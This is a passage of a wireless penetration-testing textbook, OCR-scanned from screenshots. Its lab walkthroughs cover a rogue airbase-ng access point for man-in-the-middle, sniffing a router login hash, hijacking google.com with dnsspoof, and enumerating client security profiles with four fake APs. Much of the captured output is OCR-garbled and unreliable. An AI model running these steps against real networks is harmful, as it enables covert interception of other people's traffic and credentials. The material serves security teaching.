can happen correctly usingecho » 1 /proc/sys/net/ipv4/ip forward: 


Session Edit View Bookmarks Settings Help 





rootebt:~# echo 1 > /proc/sys/net/ipv4/ip forward 
roota@bt :~# 
rootebt:~# B 





6. Now let us connect a wireless client to our access point mi t m. It would automatically 
get an IP address over DHCP (server running on the wired-side gateway). The client 
machine in this case receives the IP address 192.168. 0. 197. We can ping the 
wired side gateway 192.168. 0. 1 to verify connectivity: 


C:\Users<yvivek\AappData\Local\msf 32>ipconf ig 

Windows IP Configuration 

Wireless LAN adapter Wireless Network Connection: 
Connection-specific DHS Suffix 
Link-local IPv6 Address ... . . I FeGH: 693d: fad? 21424:ch194%11 
IPu4 Address. . DEN EET = 192.168.H.17"7 


Subnet Mask . . . . . . .. . . . 2 255.255.9255. 
Default Gateway . . . . a =- =- » « = 192.168.860.1 





7. \Nesee that the host responds to the ping requests as seen: 


Co Userssvivek\AppData’\Local’msfsa2>ping 192.168.86.1 


Pinging 192.168.80.1 with 32 bytes of data: 
192.168 .6.1: bytes=32 time=lims TTL=64 
192.168.60.1: bytes=32 time=-6ms ITTL=64 
192.168.0.1: bytes=32 time=-1tms TTL=64 


Reply from 192.168.60.1: bytes=32 time=5ms TTL=64 


Ping statistics for 192.168.0.1: 
Packets: Sent = 4, Received = 4, Lost = B (Hx 
Approximate round trip times in milli-seconds: 
Minimum = Sms, Maximum = 18ms, Average = 1ms 
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8. We can also verify that the client is connected by looking atthe airbase-ng 
terminal on the hacker machine: 


root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


rootabt:-~# alrbase-ng --essid mitm -c 11 mono 

07:52:16 Created tap interface at 

07:52:16 Trying to set MTU on atO to 1500 

07:52:16 Access Point with BSSID 00:C0:CA:3E:BD:93 started. 


08:03:14 Client 00:22:FB:35:FC:44 associated (unencrypted) to ESSID: "mitm" 





9. Itis interesting to note here that because all the traffic is being relayed from the 
wireless interface to the wired-side, we have full control over the traffic. We can 
verify this by starting Wireshark and start sniffing on the at 0 interface: 


g ato - Wireshark 
File Edit View Go Capture Analyze Statistics Telephony Tools Help 


FAAA cgnkX Oa RKO OZ GO BIG €e&F)axosxo 


Filter: v | Expression... Clear Apply 
| Fs 











No. | Time | Source | Destination | Protoco | Info 





128 49.169142  IntelCor 35:fc:44 Broadcast ARP Who has 192.168.0.1? Tell 192.168.0.197 
129 49.170017 D-Link d2:8e:25 IntelCor 35:fc:44 ARP 192.168.0.1 is at 00:21:91:d2:8e:25 


b Frame 1: 60 bytes on wire (480 bits), 60 bytes captured (480 bits) 
P Ethernet II, Src: Apple 44:99:4d (10:9a:dd:44:99:4d), Dst: Broadcast (ff:ff:ff:ff:ff:ff) 
P Address Resolution Protocol (request) 
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10. Let us now ping the gateway 192.168.0.1 from the client machine. We can now see 
the packets in Wireshark (apply a display filter for ICMP), even though the packets 
are not destined for us. This is the power of Man-in-the-Middle attacks! 


ato - Wireshark 


Fila Edit Wew Go Capture Analyze Stetistics Telephony Jools Help 
Beate eAnk*eo= * oo 25 o o [BE tsr Dua 


Filtar: iemp E Expression... Clear Apply 


Ha. Tima Source Dastinatian Prateca | infa 
10.000000 ë IntelCor 35:fc:44 Broadcast Who has 192.168.0.1? Tell 192.168.0.197 
20.000773 D-Link d2:8ae:25 IntelCor 35:fc:d4 i 182.168.0.1 1s at 0O0:21:01:d2:88:25 
a 0. 006071 lBz.168.0.187 192.168.0.1 j Echo (ping! request  (idsüxOOOl, seqg(be/le)zsa3/21248, ttl=128) 
4 0.008577 182.168.0.197 Echo (ping) reply gad(ba/la)cu3/21248, 
5 1.001855 18z.168.0.197 183.168.0.1 Echo (ping) request (idsOxOoOl, seq(be/le)sga/21504, ttlsi278) 
& 1.002774 197.168.0.1 192. 168.0. 197 } Echo [ping] reply (ideuxcOOl, seq[be/le)zBayz1504, trl=s4) 
72.014750  192.188.0.157 152, 158.0. 1 Echo (ping) request  (idenxOO01, seq(he/le)zBS/21760, ttlz128) 
H 2.018575 — 192.188.0.1 192. 188.0. 157 Echo (pang) reply (id-OxOOOl, seq(be/le]-85/21750, ttl-84) 
9 3.003574 19z.168.0.197 19g.16H.Q0.1 Echo (ping) request (id=0x0001, seqí(be/le)s86/22016, ttl=129) 
10 3.008504 192.168.0.1 182.168.0.197 Echo (ping) reply (id=twO001, seqlbe/lel=s6/22016, ttl=54) 
| Frame 4: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) 
b Ethernet II, Sre: D-Link d2:8e:25 (00:21:91:42:8a8:25), Dst: IntelCor x5:fc:44 [00:22:1b: 5: fc : 44] 
| Internet Protocol, Src: 182.168.0.1 [182.168.0.1], Det: 192.168.0.187 [182.1658.0.197] 
(7 Internet Control Message Protocol 
Type: DO {Echo (ping) reply) 
Code: oO 
Checksum: 025508 [correct] 
Identifier: OxOOOl 
Sequence number: &3 (Ox0053] 
Sequence number (LE): 21248 [015300] 
* Data (33 bytes) 
Data: 6162636465066/68696acb6cGd6e61 7071727374757677681... 
[Length: 32] 


o0 32 fb 35 fe 44 00 21 91 d2 Be 25 Of OO 45 o0 
o) 3c ga Of oo oO 4o 0] fS sh co aB OO O1 cO aE 
D c5 OO DO 55 DB OD 01 OD 53 Bl 62 5&3 B4 S eg 

Bp 689 ga 6) Gc Gd Ge of 70 71 72 73 74 75 76 


e Frame (rama). 74 bytes J É ; Profile: Default 





X 5290 A 
We have successfully created the setup for a wireless Man-In-The-Middle attack. We did this 
by creating a fake access point and bridging it with our Ethernet interface. This ensured that 
any wireless client connecting to the fake access point would "perceive" that it is connected 
to the Internet via the wired LAN. 








Have a go hero - Man-in-the-Middle over pure wireless 


In the previous exercise, we bridged the wireless interface with a wired one. As we noted 
earlier, this is one of the possible connection architectures for an MITM. There are other 
combinations possible as well. An interesting one would be to have two wireless interfaces, 
one creates the fake access point and the other interface is connected to the authorized access 
point. Both these interfaces are bridged. So, when a wireless client connects to our fake access 
point, it gets connected to the authorized access point through the attacker machine. 
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Please note that this configuration would require the use of two wireless cards on the 
attacker laptop. 


Check if you can conduct this attack using the in-built card on your laptop along with the 
external one. This should be a good challenge! 


Wireless Eavesdropping using MITM 


In the previous lab, we have learned how to create a setup for MITM. Now we will look at 
how to do Wireless Eavesdropping with this setup. 


The whole lab revolves around the principle that all the victim's traffic is now routed through 
the attacker's computer. Thus the attacker can eavesdrop on all the traffic sent to and from 
the victim's machine over wireless. 





Time for action — wireless eavesdropping 


Follow these instructions to get started: 


1. Replicate the entire setup as in the previous lab. Fire up Wireshark. It would be 
interesting to note that even the mitm-bridge shows up. This interface would allow 
us to peer into the bridge traffic, if we wanted to: 


Wireshark: Capture interfaces 


Sat Options 
S wland giant Options 
* mond 153 5 Stet Options 
5S ato 5 i Siat Options 
i? mar bridge 192.188.099 15 i Start Options 
E* ary Pseudo-device that captures on all interfaces 1576 67 Stat Options 


Ë ustrnonl USO bus number 1 iat Options 
o Website 
| 


Vitit the eraject’é website 


Sart Options 
Close 
User's Guide 


The User's Guide lomine version 


d Sample Captures d Security 
LE A rich assortment of example captu pa th Work wth Wrethark os securely at possible 
ge; marn Drage 


gs?! Peeudo-device that captures or 


2:4 Capture Options 
ài CAP p 


Start a capture with detafed options 


Capture Help 


~ How to Capture 


Step by tte» ! apture cetup 


g Network Media 


Specific information for capturing om Ethernet. WLAN 


Profile: Default 
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2. Start sniffing on the at 0 interface, so that we can monitor all traffic sent and 
received by the wireless client: 


Capturing from ato - Wireshark 


Menu) Edit Yiew Go Capture Analyze Statistics Telephony Tools Help 


Beate 9dxeo- 28 OS GH EIR e@s=th BMPR OG 
Fier: | Expression... Clear Apply 
No. ! Source Destination Protoco | Info 


| 


D-Link d2:Be:25 IntelCor 35:fc:44 192.188.0.1 15 at 00:21:91:d2:8e:25 
192.188.0.197 192.168.0.1 Echo (ping) request (id=0x0001, seq(be/le)=115/29440, ttlz128) 
192.168.0.1 192.168.0.197 Echo (ping) reply  (idzOxO00l, seq(be/le)=115/29440, ttl=64) 


71.001344  192.168.0.197 192.168.0.1 Echo (ping) request (id=0x0001, seq(be/le)2116/29696, ttls128) 
8 1.002166 .168. 192.168.0.197 Echo (ping) reply (1ds0x0001, seq(be/le)s116/29696, ttl=64) 
9 2.002856 .168.0. 192.168.0.1 Echo (ping) request {id=0x0001, seq(be/le)z117/29952, ttl=128) 
10 2.003421 . -0. 192. 168.0.197 Echo (ping) reply {ad=0x0001, seq(be/le)=117/20052, ttl-64) 
11 3.001149 ; .O. 192.168.0.1 Echo (ping) request ({id=0x0001, seq(be/le)s118/30208, ttl-128) 
192.168.0.197 &cho (ping) reply tid=0x0001, seq(be/le)-118/30208, 


> Frame 1: 60 bytes on wire (480 bits), 60 bytes captured (480 bits) 
> Ethernet II, Src: IntelCor 38:fc:44 (00:22:fb:35:fe:44), Dst: Broadcast (ff:ff:ff:ff:ff:ff) 
> Address Resolution Protocol (request) 


ff ff ff ff ff ff 00 22 fb 35 fc 44 O8 O6 OO Ol 
Oe OO 06 O4 OO O1 00 22 fb 35 fc 44 cO ag OO cS 
OO 00 OO OO OO OO cO ag OO Ol OO OO OO OO OO OO 
OO OO OO OO OO 00 OO OO OO OO OO OO 


^ || Packets: 14 Displayed: 14 Marked: 0 | Profile: Default 





3. Onthe wireless client, open up any web page. In my case, the wireless access 
point is also connected to LAN and | will open it up by using the address: 
http://192.168.0. 1: 
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Product Page: DIR-615 Hardware Version: B2 Firmware Version: 2.23 


Log in to the router: 


User Name: Admin B) 


WIRELESS 


4. Sign in with my password and enter the management interface. 





Product Page: DIR-615 Hardware Version: B2 Firmware Version: 2.23 


EESO SEL TANS There are two ways to set up your Internet connection: you can use the Web-based Internet 
NETWORK SETTINGS Connection Setup Wizard, or you can manually configure the connection. 


INTERNET CONNECTION SETUP WIZARD 


If you would like to utilize our easy to use Web-based Wizards to assist you in connecting your new 
D-Link Systems Router to the Internet, click on the button below. 


( Internet Connection Setup Wizard ) 


Note: Before launching these wizards, please make sure you have followed all steps outlined in the 
Quick Installation Guide included in the package. 


MANUAL INTERNET CONNECTION OPTIONS 


If you would like to configure the Internet settings of your new D-Link Systems Router manually, 
then click on the button below. 


/ Manual Internet Connection Setup ) 


WIRELESS 


Copyright © 2004-2007 D-Link Systems, Inc. 


Helpful Hints... 


If you are new to 
networking and have 
never configured a router 
before, click on Internet 
Connection Setup 
Wizard and the router 
will guide you through a 
few simple steps to get 
your network up and 
running. 


If you consider yourself an 
advanced user and have 
configured a router before, 
dick Manual Internet 
Connection Setup to 
input all the settings 
manually. 
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5. |n Wireshark, we should be seeing a lot of activity: 


ato - Wireshark 


Ble Edt View Go Capture Analyze Statistics Telephony Tool Help 


Beeee cuxe= KOOsoe SP eenh SMen c 


Fiter |- | Expression... Clear Apply 


No. | Tne | Source | Destination Proteco info 


b Frame 1: 60 bytes on wire [480 bits), 60 bytes captured (480 bits) 
b Ethernet II, Src: IntelCor, 35:fc:44 (00:22:fb:35:fc:44), Ost: Broadcast (ffiff:ffiffiff:ff) 
> Address Mesolution Protocol (request) 


cooo ff ff ff ff 
0010 08 00 05 04 





6. 





Bie gdi Yew Ge Capture Analyze Statistics Telephony Jools Help ———— 
Bee ouxe- Aoo sooo ORAN Kms 
le Kxpramion... Clear Apply 
| Destination | Pratoco | info 


b Frame 150; SOT bytes on wire (8056 bite), SOF bytes captured (4056 bite) 
bo Gtharcet II, Srei IntelCor 35:íc:d4 [D0:z2:íb:g8idcrad), Dat: D-Link di: te: [00:21:01:d2:89: 25] 
b Internet Protecol, Gro: 192.158.0.187 (182.158.0.197], Dst: 192.158.0.1 [182.158.0.1] 
5 Transmission Control Protocol, Src Pert; 4mssg (40059), Det Port: http (60), Seq: 415, Ack agp, Len: 453 
|"" 
$ 
Host: 192. 168.0. rin 
User-Agent: Hazilla/S.0 [windswa; U; Windews MT 6.0; en-US; rvil. 9.2.15] Oecko/ 20110000 Firefar/3.5.15 [.MET CLA 3.5.30729)rin 
Accept: Image/png, Aagi," geð B, ge S rn 
Accept-Lanpiager en:us,anrqsD. SA rn 
Accept-Dnesding: gaip, dat lateXrhn 
Accept- Charter: I120-BiSo- luti- B; qrO. 7, "aed. Tr 
Keap.Aliver 115A.r3m 
Connection: keap-alive.rin 
oon 00 21 91 dž üə 25 DO z3 fb 35 fc 4& O DO 49 OO  .l...*," OSL, 
nig O1 ed 3d 05 èi OO BO OS Bef cD ak OO c5 cO all Lem Berea 
me DO 0l cl x 00 50 5e 49 OI fe 85 H ba 42 50 ]B  ,..x,P,I ..&7,.BP. 
loci az Sd Sd 7d On 00 47 45 Sa a zd aa 6d 61 57 85 EJIP. GE T rIsaqe 


az "ipei i "proi tis xb 
(le: ‘rpéwresharkcocceh bam 1... || Packets: 290 Displayed: 29 Marked: 0 Dropped: 6 





Chapter 7 


7. \Necan easily locate the HTTP post request, which was used to send the password 
to the wireless access point: 


ato - Wireshark 


Menu|Edr wiew Go Capture Analyze Statistics Telephony Jools Help 
Hmee@a cguox eo = * oo 4 GHEE =F ai ?* 
|= | Expression... Clear Apply 
| Protoco | info 








b Frame 20H; S02 bytes on wire (4016 bits), Soe bytes captured (4016 bita) 

Ethernet II, Sre: IntelCor 35:fc:44 [00:22:1b:35:1c:44], Ost: D-Link d2:Be:25 [O0:zl:0]rdz:Berz5] 

P Internet Protocol, Src: 192.168.0.197 (192.158,0.197], Dat: 192.158.0.1 [192.158.0.1] 

b Transmission Control Protocol, Sre Port: 45472 (49472), Dat Port: http (B0), Seq: 396, ack: 18904, Len: 44H 


b [Expert Info (chat/Sequence)]: GET /post login.xml?hashzose7esi scaracaozsasogdocenéceb2634b417d8 HTTP/L. irin] 
Request Method: GET 
Ragin Piri nast ji xim 5 hzudefosmp*cedraáes 
Request Version: HTTP/1.1 

Most: 192. 166. 0.1 rn 

Liter: Agent: Mazillag5.0 (Windows: U; Windows MT 86.0; en-US: rw:1.9.2.15] Gecko/20110009 Firefaox/3.5.15 (.MET CLA 3.5. 3072S) rn 

Accept: text/html,application/xhtml*xml,applicatian/xml;q-znD.9,*/*:920.Brin 

Accept-Language: en-us,en;gqzo.r*n 

Accapt-Enceding: gzip,deflate.rin 

Accapt-Chargat: 150-G059- L,utt-Gige0.7, "gO. 7ir^n 

Keep-Alive: LIS\r\n 

Connaction: keep-aliveirin 

rin 

030 44 3h a9 do 00 DO 47 45 54 20 rii ey 





“7 38 69 S i "rr ET. Sate tien T6rab?53 


| Packets: 280 Displayed: 28 Marked: à Dropped: 0 [ Profile: Defaut | 





8. Next is a magnified look at the preceding packet: 


b Frame 208: 502 bytes on wire (4016 bits), 502 bytes captured (4016 bits) 

P Ethernet II, Src: IntelCor 35:fc:44 (00:22:fb:35:fc:44), Dst: D-Link d2:8e:25 (00:21:91:d2:8e:25) 

> Internet Protocol, Src: 192.168.0.197 (192.168.0.197), Dst: 192.168.0.1 (192.168.0.1) 

P Transmission Control Protocol, Src Port: 49472 (49472), Dst Port: http (80), Seq: 396, Ack: 18904, Len: 448 


P [Expert Info (Chat/Sequence): GET /post login.xml?hashz94e7eB8f5c474c69258308d9ce76ceb2634b417d5 HTTP/1.1Xr^n] 
Request Method: GET 
Request URI: /post yr. ® 
Request Version: HTTP/1.1 

Host: 192.168.0.1\r\n 

User-Agent: Mozilla/5.0 (windows; U; Windows NT 6.0; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 (.NET CLR 

Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\n 

Accept-Language: en-us,en;q=0.5\r\n 

Accept-Encoding: gzip,deflate\r\n 

Accept-Charset: IS0-8859-1,utf-8;q=0.7,*;q=0.7\r\n 

Keep-Alive: 115\r\n 

Connection: keep-alive\r\n 

irn 

0030 44 3b e9 dO OO OO 47 45 54 20 
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9. Expanding on the HTTP header, allows us to see that actually the password we 
entered in plaintext was not sent as is, but instead, a hash has been sent. If we 
look at packet no 64 in the preceding screenshot, we see that a request was made 
for / md5. js, which makes us suspect that it is a md5 hash of the password. It is 
interesting to note here that this technique may be prone to a replay attack, if a 
cryptographic salt is not used on a per session basis in the creation of the hash. 
We leave it as an exercise for the user to find out the details, as this is not part of 
wireless security and hence beyond the scope of this book. 


v 


v 


b [Expert Info (Chat/Sequence): GET /post login.xml?hashz94e7e8f5c474c69258308d9ce76ceb2634b417d5 HTTP/1.1\r\n] 


Request Method: GET 
Request URI: /post login.xml?hash-z94e7e8f5c474c69258308d9ce76ceb2634b417d5 
Request Version: HTTP/1.1 





10. This shows how easy it is to monitor and eavesdrop on traffic sent by the client 
during a Man-In-The-Middle attack. 






X GEV OAK GE 
The MITM setup we created is now allowing us to eavesdrop on the victim's wireless 
traffic without the victim knowing. This is possible because in an MITM all the traffic is 
relayed via the attacker machine. Thus all of the victim's unencrypted traffic is available for 
eavesdropping for the attacker. 


In today's world, all of us would like to keep what we search on Google private. The traffic on 
Google search is unfortunately over HTTP and plain text, by default. 


Can you think of an intelligent display filter you could use with Wireshark to view all the 
Google searches made by the victim? 


RAKE ERASE HD EEA 


One of the other interesting attacks we can build on top of MITM is application session 
hijacking. During an MITM attack, the victim's packets are sent to the attacker. It is now the 
attacker's responsibility to relay this to the legitimate destination and relay the responses 
from the destination to the victim. An interesting thing to note is that, during this process 
the attacker can modify the data in the packets (if unencrypted and sunprotected from 
tampering). This means he could modify, mangle, and even silently drop packets. 


In this next example, we will look at DNS hijacking over Wireless using the MITM setup. Then 
using DNS Hijacking, we will hijack the browser session to Googl e. com. 


EKO 
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Time for action — session hijacking over wireless 


1. Setup the test exactly as in the Man-in-the-Middle attack lab. On the victim let's 
fire up the browser and type in "google.com". Let us use Wireshark to monitor this 
traffic. Your screen should resemble the following: 


| Source Destination | Protoco | Info 
1 0.000000 IntelCor 35:fc: 4 Broadcast Who has 192.168.0.1? Tell 192.168.0.197 


2 0.000603 . D-Link d2:8e:25 IntelCor 35:fc:44 ARP 192.168.0.1 1s at 00:21:91:d2:8e:25 


63.415114 D-Link_d2:8e:25 Broadcast 





2. Apply a Wireshark filter for DNS and as we can see, the victim is making DNS 
requests for "google.com": 


ato - Wireshark 
Edit View Go Capture Analyze Statistics Telephony Tools Help 


m aae ài ou*xo- *oo0424o o BIG €* e & Fl 
Filter: | dns [>] Expression... Clear Apply 


Source Destination Protoco 





5 2.000004 192.168.0.197 192.168.0.1 Standard query A google.com 


' Frame 5: 70 bytes on wire (560 bits), 70 bytes captured (560 bits) 
P Ethernet II, Src: IntelCor 35:fc:44 (00:22:fb:35:fc:44), Dst: D-Link d2:8e:25 (00:21:91:d2:8e:25) 
P Internet Protocol, Src: 192.168.0.197 (192.168.0.197), Dst: 192.168.0.1 (192.168.0.1) 
P User Datagram Protocol, Src Port: 63500 (63500), Dst Port: domain (53) 
v Domain Name System (query) 
Transaction ID: 0x72a3 
P Flags: OxO100 (Standard query) 
Questions: 1 
Answer RRs: O 
Authority RRs: O 
Additional RRs: O 
v Queries 
v google.com: type A, class IN 
Name: google.com 
Type: A (Host address) 
Class: IN (0x0001) 
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3. In order to hijack the browser session we will need to send fake DNS responses 
which will resolve the IP address of "google.com" to the hacker machine's IP address 
192.168.0.199. The tool we will use for this is called Dnsspoof and the syntax is 
dnspoof -i mitm-bri dge: 


root@bt: ~ - Shell No. 2 - Konsole 
pn Edit View Bookmarks Settings Help 





rootebt:~# dnsspoof -i mitm-bridge 


dnsspoof: listening on mitm-bridge [udp dst port 53 and not src 192.168.0.199] 





4. Refresh the browser windows and now as we can see through Wireshark, as soon 
as the victim makes a DNS request for any host (including google.com), Dnsspoof 
replies back: 


Ej r5 root@bt: ~ - Shell No. 2 - Konsole 
|Menujn Edit View Bookmarks Settings Help 





root@bt:-# dnsspoof -i mitm-bridge 
dnsspoof: listening on mitm-bridge [udp dst port 53 and not src 192.168.0.199] 


192.168.0.197.52658 > 192.168.0.1.53: 47096+ A? google.com 


S) Capturing from atO - Wireshark 
File Edit View Go Capture Analyze Statistics Telephony Tools Help 


= 9004600 BESA 05x: 


Filter: | dns | ~ | Expression... Clear Apply 








No. | Time | Source | Destination | Protoco | Info 


8 7.509354 192.168.0.1 192.168.0.197 Standard query response A 192.168.0.199 


P Frame 8: 86 bytes on wire (688 bits), 86 bytes captured (688 bits) 
P Ethernet II, Src: Alfa 3e:bd:93 (00:c0:ca:3e:bd:93), Dst: IntelCor 35:fc:44 (00:22:fb:35:fc:44) 
P Internet Protocol, Src: 192.168.0.1 (192.168.0.1), Dst: 192.168.0.197 (192.168.0.197) 
P User Datagram Protocol, Src Port: domain (53), Dst Port: 52664 (52664) 
" Domain Name System (response) 
[Request In: 5] 
[Time: 0.007317000 seconds] 
Transaction ID: Oxd5ld 
Flags: Ox8180 (Standard query response, No error) 
Questions: 1 
Answer RRs: 1 
Authority RRs: O 
Additional RRs: O 
b Queries 
" Answers 
v google.com: type A, class IN, addr 192.168.0.199 
Name: google.com 
Type: A (Host address) 
Class: IN (0x0001) 
Time to live: 1 minute 
Data length: 4 
Addr: 192.168.0.199 (192.168.0.199) 





' 
ncs 
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5. On the victim machine, we see an error which says "Connection Refused". This is 
because we have made the IP address for google.com as 192.168.0.199 which is the 
hacker machine's IP, but there is no service listening on port 80: 


»ocdgl 
geugie «corn 


Unable to connect 


Firefox can't establish à connection to the server at google.com 


& The ste could be temporarily unavailable of töö busy. Try again in à few moments 
e f you are unable to load any pages, check your computer s network connection 


e P your computer or network is protected by a firewall or proxy, make sure that 
Firefox n permetted to access the Web 


Try Again 





6. Let us run Apache on BackTrack using the following command apachet 2ct | 
Start: 


Lr | 


root@bt: ~ - Shell No. 3 - Konsole 


Session Edit View Bookmarks Settings Help 


rootabt:-~# apache2ctl start 

apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName 
root@bt:~# 

root@bt:~# 

rootebt:~# J 








7. Now once we refresh the browser on the victim, we are greeted with It Works 
default page of Apache: 


Fée Edit View Hgtory Bookmarts Tools Help Belated Linis 


CH= SK ne 


http//eoogle.com/ 


It works! 
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8. This demonstration shows how it is possible to intercept data and send spoofed 
responses to hijack sessions on the victim. 





* FEV OA ae T H 
We did an application hijacking attack using a Wireless MITM as the base. So what happened 
behind the scenes? The MITM setup ensured that we were able to see all the packets sent 
by the victim. As soon as we saw a DNS request packet coming from the victim, the Dnsspoof 
program running on the attacker's laptop sent a DNS response to the victim with the attacker 
machine's IP address as that of googl e. com. The victim's laptop accepts this response and 
the browser sends an HTTP request to the attacker's IP address on port 80. 





In the first part of the experiment, there was no listening process on port 80 of the attacker's 
machine and thus Firefox responded with an error. Then, once we started the Apache server 
on the attacker's machine on port 80 (default port), the browser's requested received a 
response from the attacker's machine with the default It Works page. 


This lab shows us that once we have full control of the lower layers (Layer 2 in this case), it is 
easy to hijack applications running on higher layers such as DNS clients and web browsers. 





The next step in session hijacking using a wireless MITM would be to modify the data being 
transmitted by the client. Explore software available on BackTrack called Ettercap. This will 
help you create search and replace filters for network traffic. 


In this challenge, write a simple filter to replace all occurrences of "security" in the network 
traffic to "insecurity". Try searching Google for "security" and check if the results show up for 
"insecurity" instead. 


Finding security configurations on the client 


In previous chapters, we have seen how to create honeypots for open access points, WEP 
protected and WPA, but when we are in the field and see Probe Requests from the client, 
how do we know which network the probed SSID belong to. 


Though this seems tricky at first, the solution to this problem is simple. We need to 
create access points advertising the same SSID but different security configurations 
simulataneously. When a roaming client searches for a network, it will automatically 
connect to one of these access points based on the network configuration stored on it. 


So let the games begin! 


FXR K 
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Time for action — enumerating wireless security protiles 





1. Wewill assume that the wireless client has a network Wireless Lab configured on 
it and it actively sends Probe Requests for this network, when it is not connected to 
any access point. In order to find the security configuration of this network, we will 
need to create multiple access points. For our discussion, we will assume that the 
client profile is either—an open network, WEP protected, WPA-PSK or WPA2-PSK. 
This would mean we would have to create four access points. To do this we will first 
create four virtual interfaces—monO to mon3 using the ai rmon-ng start wi and 
command multiple times: 


root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


root@bt:-# airmon-ng start wlanO 


Chipset Driver 


RTL8187 rtl8187 - [phy2] 
(monitor mode enabled on monl) 
RTL8187 rtl8187 - [phy2] 


root@bt:-# airmon-ng start wlanO 


Chipset Driver 


RTL8187 rtl8187 - [phy2] 

(monitor mode enabled on mon2) 
RTL8187 rtl8187 - [phy2] 
RTL8187 rtl8187 - [phy2] 


root@bt:-# airmon-ng start wlanO 


Chipset Driver 


RTL8187 rtl8187 - [phy2] 
(monitor mode enabled on mon3) 
RTL8187 rtl8187 - [phy2] 
RTL8187 rtl8187 - [phy2] 
RTL8187 rtl8187 - [phy2] 





Advanced WLAN Attacks 


2. You could view all these newly created interfaces using thei f config -a 
command: 


Link encap:UNSPEC HWaddr 00-C0-CA-3E-BD-93-00-00-00-00-00-00-00-00-00-00 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:2111 errors:0 dropped:0 overruns:0 frame:0 

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 

collisions:0 txqueuelen:1000 

RX bytes:245105 (245.1 KB) TX bytes:0 (0.0 B) 


Link encap:UNSPEC HWaddr 00-C0-CA-3E-BD-93-00-00-00-00-00-00-00-00-00-00 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:1164 errors:0 dropped:0 overruns:0 frame:0 

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 

collisions:0 txqueuelen:1000 

RX bytes:125255 (125.2 KB) TX bytes:0 (0.0 B) 


Link encap:UNSPEC HWaddr 00-C0-CA-3E-BD-93-00-00-00-00-00-00-00-00-00-00 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:1085 errors:0 dropped:0 overruns:0 frame:0 

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 

collisions:0 txqueuelen:1000 

RX bytes:116659 (116.6 KB) TX bytes:0 (0.0 B) 


Link encap:UNSPEC HWaddr 00-C0-CA-3E-BD-93-00-00-00-00-00-00-00-00-00-00 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:887 errors:0 dropped:0 overruns:0 frame:0 

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 

collisions:0 txqueuelen:1000 

RX bytes:95727 (95.7 KB) TX bytes:0 (0.0 B) 





3. Now we will create the Open AP on monO: 


root@bt: ~ - Shell No. 2 - Konsole 
Session Edit View Bookmarks Settings Help 


rootebt:-# airbase-ng --essid "Wireless Lab" -a AA:AA:AA:AA:AA:AA -c 3 monO 
01:56:20 Created tap interface at0 

01:56:20 Trying to set MTU on atO to 1500 

01:56:21 Access Point with BSSID AA:AA:AA:AA:AA:AA started. 








4d. Let's create the WEP-protected AP on mont: 


ro root@bt: ~ - Shell No. 3 - Konsole 
Session Edit View Bookmarks Settings Help 


root@bt:-# airbase-ng --essid "Wireless Lab" -c 3 -a BB:BB:BB:BB:BB:BB -W 1 monl 
For information, no action required: Using gettimeofday() instead of /dev/rtc 
01:59:44 Created tap interface atl 

01:59:44 Trying to set MTU on atl to 1500 





ti set mac failed: Cannot assign requested address 
You most probably want to set the MAC of your TAP interface. 
ifconfig <iface> hw ether BB:BB:BB:BB:BB:BB 


01:59:45 Access Point with BSSID BB:BB:BB:BB:BB:BB started. 
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5. The WPA-PSK AP will be on mon2: 


root@bt: ~ - Shell No. 4 - Konsole 


on Edit View Bookmarks Settings Help 





rootabt:-# airbase-ng --essid "Wireless Lab" -c 3 -a CC:CC:CC:CC:CC:CC -W 1 -z 2 mon2 
For information, no action required: Using gettimeofday() instead of /dev/rtc 
01:58:48 Created tap interface at2 

01:58:48 Trying to set MTU on at2 to 1500 


01:58:48 Trying to set MTU on mon2 to 1800 
01:58:48 Access Point with BSSID CC:CC:CC:CC:CC:CC started. 





6. \WPA2-PSK AP will be on mon3: 


a root@bt: ~ - Shell No. 5 - Konsole 
Session Edit View Bookmarks Settings Help 
rootebt:-# airbase-ng --essid "Wireless Lab" -c 3 -a DD:DD:DD:DD:DD:DD -W 1 -Z 2 mon3 
For information, no action required: Using gettimeofday() instead of /dev/rtc 
02:00:31 Created tap interface at3 
02:00:31 Trying to set MTU on at3 to 1500 
02:00:31 Trying to set MTU on mon3 to 1800 





ti set mac failed: Cannot assign requested address 
You most probably want to set the MAC of your TAP interface. 
ifconfig <iface> hw ether DD:DD:DD:DD:DD:DD 


02:00:32 Access Point with BSSID DD:DD:DD:DD:DD:DD started. 





7. Wecanrunairodump- ng on the same channel to ensure all the four access points 
are up and running as shown: 


g root@bt: ~ - Shell No. 6 - Konsole 
Session Edit View Bookmarks Settings Help 





CH 1 ][ Elapsed: 8 s ][ 2011-06-28 02:00 


PWR RXQ Beacons #Data, #/s ENC CIPHER AUTH ESSID 


0 100 107 OPN Wireless Lab 
0 100 107 WPA TKIP PSK Wireless Lab 
0 100 107 WPA2 TKIP PSK Wireless Lab 
0 100 107 WEP WEP Wireless Lab 





8 G i AS 
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8. Now let's switch the Wi-Fi on, on the roaming client. Depending on which Wireless 
Lab network you had connected it to previously, it will connect to that security 
configuration. In my case, it connects to the WPA-PSK network as shown below. 


“mo root@bt: ~ - Shell No. 4 - Konsole 
Session Edit View Bookmarks Settings Help 


rootabt:-# airbase-ng --essid "Wireless Lab" -c 3 -a CC:CC:CC:CC:CC:CC -W 1 -z 2 mon2 
For information, no action required: Using gettimeofday() instead of /dev/rtc 
01:58:48 Created tap interface at2 
:58: Trying to set MTU on at2 to 1500 
Trying to set MTU on mon2 to 1800 
Access Point with BSSID CC:CC:CC:CC:CC:CC started. 


Client C8:BC:C8:EE:12:0B associated (WPA1;TKIP) to : "Wireless 
Client C8:BC:C8:EE:12:0B associated (WPA1;TKIP) to : "Wireless 
Client C8:BC:C8:EE:12:0B associated (WPA1;TKIP) to : "Wireless 
